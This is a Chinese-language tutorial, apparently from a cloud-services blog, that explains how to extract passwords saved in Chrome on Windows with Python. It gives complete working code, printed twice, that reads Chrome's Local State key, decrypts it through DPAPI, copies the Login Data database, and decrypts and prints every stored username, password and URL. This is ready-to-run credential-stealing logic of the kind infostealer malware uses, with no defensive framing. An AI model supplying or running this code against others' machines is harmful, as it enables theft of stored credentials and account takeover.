溫馨提示×
您好,登錄后才能下訂單哦!
點擊 登錄注冊 即表示同意《億速云用戶服務條款》
您好,登錄后才能下訂單哦!
小編給大家分享一下怎么使用Python提取Chrome瀏覽器保存的密碼,希望大家閱讀完這篇文章之后都有所收獲,下面讓我們一起去探討吧!
由于Chrome會將大量瀏覽數據本地保存磁盤中,在本教程中,我們將編寫 Python 代碼來提取 Windows 計算機上 Chrome 中保存的密碼。
首先,讓我們安裝所需的庫:
pip install pycryptodome pypiwin32
打開一個新的 Python 文件,并導入必要的模塊:
import os import json import base64 import sqlite3 import win32crypt from Crypto.Cipher import AES import shutil from datetime import timezone, datetime, timedelta
在直接進入提取 chrome密碼之前,我們需要定義一些有用的函數來幫助我們在主函數中。
def get_chrome_datetime(chromedate): """從chrome格式的datetime返回一個`datetime.datetime`對象 因為'chromedate'的格式是1601年1月以來的微秒數""" return datetime(1601, 1, 1) + timedelta(microseconds=chromedate) def get_encryption_key(): local_state_path = os.path.join(os.environ["USERPROFILE"],"AppData", "Local", "Google", "Chrome","User Data", "Local State") with open(local_state_path, "r", encoding="utf-8") as f: local_state = f.read() local_state = json.loads(local_state) # 從Base64解碼加密密鑰 key = base64.b64decode(local_state["os_crypt"]["encrypted_key"]) # 刪除 DPAPI str key = key[5:] # 返回最初加密的解密密鑰 # 使用從當前用戶的登錄憑據派生的會話密鑰 # 官方文檔doc: http://timgolden.me.uk/pywin32-docs/win32crypt.html return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1] def decrypt_password(password, key): try: # 獲取初始化向量 iv = password[3:15] password = password[15:] # 生成密碼 cipher = AES.new(key, AES.MODE_GCM, iv) # 解密密碼 return cipher.decrypt(password)[:-16].decode() except: try: return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1]) except: # not supported return ""
get_chrome_datetime()函數負責將 chrome 日期格式轉換為人類可讀的日期時間格式。
get_encryption_key()函數提取并解碼用于加密密碼的AES密鑰,這"%USERPROFILE%\AppData\Local\Google\Chrome\User Data\Local State"作為 JSON 文件存儲在路徑中
decrypt_password() 將加密密碼和 AES 密鑰作為參數,并返回密碼的解密版本。
下面是main主要功能:
def main():
# 獲取AES密鑰
key = get_encryption_key()
# 本地sqlite Chrome數據庫路徑
db_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local","Google", "Chrome", "User Data", "default", "Login Data")
# 將文件復制到其他位置
# 因為如果chrome當前正在運行,數據庫將被鎖定
filename = "ChromeData.db"
shutil.copyfile(db_path, filename)
# 連接數據庫
db = sqlite3.connect(filename)
cursor = db.cursor()
# 登錄表中有我們需要的數據
cursor.execute("select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins order by date_created")
# iterate over all rows
for row in cursor.fetchall():
origin_url = row[0]
action_url = row[1]
username = row[2]
password = decrypt_password(row[3], key)
date_created = row[4]
date_last_used = row[5]
if username or password:
print(f"Origin URL: {origin_url}")
print(f"Action URL: {action_url}")
print(f"Username: {username}")
print(f"Password: {password}")
else:
continue
if date_created != 86400000000 and date_created:
print(f"Creation date: {str(get_chrome_datetime(date_created))}")
if date_last_used != 86400000000 and date_last_used:
print(f"Last Used: {str(get_chrome_datetime(date_last_used))}")
print("="*50)
cursor.close()
db.close()
try:
# 嘗試刪除復制的db文件
os.remove(filename)
except:
pass首先,我們使用之前定義的get_encryption_key()函數獲取加密密鑰,然后我們將 sqlite 數據庫(位于"%USERPROFILE%\AppData\Local\Google\Chrome\User Data\default\Login Data"保存密碼的位置)復制到當前目錄并連接到它,這是因為原始數據庫文件將被鎖定Chrome 當前正在運行。
之后,我們對登錄表進行選擇查詢并遍歷所有登錄行,我們還解密每個密碼date_created并將date_last_used日期時間重新格式化為更易于閱讀的格式。
最后,我們打印憑據并從當前目錄中刪除數據庫副本。
讓我們調用主函數,完美提取Chrome瀏覽器保存的密碼:
完整代碼
import os
import json
import base64
import sqlite3
import win32crypt
from Crypto.Cipher import AES
import shutil
from datetime import datetime, timedelta
def get_chrome_datetime(chromedate):
"""從chrome格式的datetime返回一個`datetime.datetime`對象
因為'chromedate'的格式是1601年1月以來的微秒數"""
return datetime(1601, 1, 1) + timedelta(microseconds=chromedate)
def get_encryption_key():
local_state_path = os.path.join(os.environ["USERPROFILE"],
"AppData", "Local", "Google", "Chrome",
"User Data", "Local State")
with open(local_state_path, "r", encoding="utf-8") as f:
local_state = f.read()
local_state = json.loads(local_state)
key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
key = key[5:]
return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1]
def decrypt_password(password, key):
try:
iv = password[3:15]
password = password[15:]
cipher = AES.new(key, AES.MODE_GCM, iv)
return cipher.decrypt(password)[:-16].decode()
except:
try:
return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1])
except:
# not supported
return ""
def main():
key = get_encryption_key()
db_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local",
"Google", "Chrome", "User Data", "default", "Login Data")
filename = "ChromeData.db"
shutil.copyfile(db_path, filename)
db = sqlite3.connect(filename)
cursor = db.cursor()
cursor.execute("select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins order by date_created")
# iterate over all rows
for row in cursor.fetchall():
origin_url = row[0]
action_url = row[1]
username = row[2]
password = decrypt_password(row[3], key)
date_created = row[4]
date_last_used = row[5]
if username or password:
print(f"Origin URL: {origin_url}")
print(f"Action URL: {action_url}")
print(f"Username: {username}")
print(f"Password: {password}")
else:
continue
if date_created != 86400000000 and date_created:
print(f"Creation date: {str(get_chrome_datetime(date_created))}")
if date_last_used != 86400000000 and date_last_used:
print(f"Last Used: {str(get_chrome_datetime(date_last_used))}")
print("="*50)
cursor.close()
db.close()
try:
# try to remove the copied db file
os.remove(filename)
except:
pass
if __name__ == "__main__":
main()看完了這篇文章,相信你對“怎么使用Python提取Chrome瀏覽器保存的密碼”有了一定的了解,如果想了解更多相關知識,歡迎關注億速云行業資訊頻道,感謝各位的閱讀!
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。
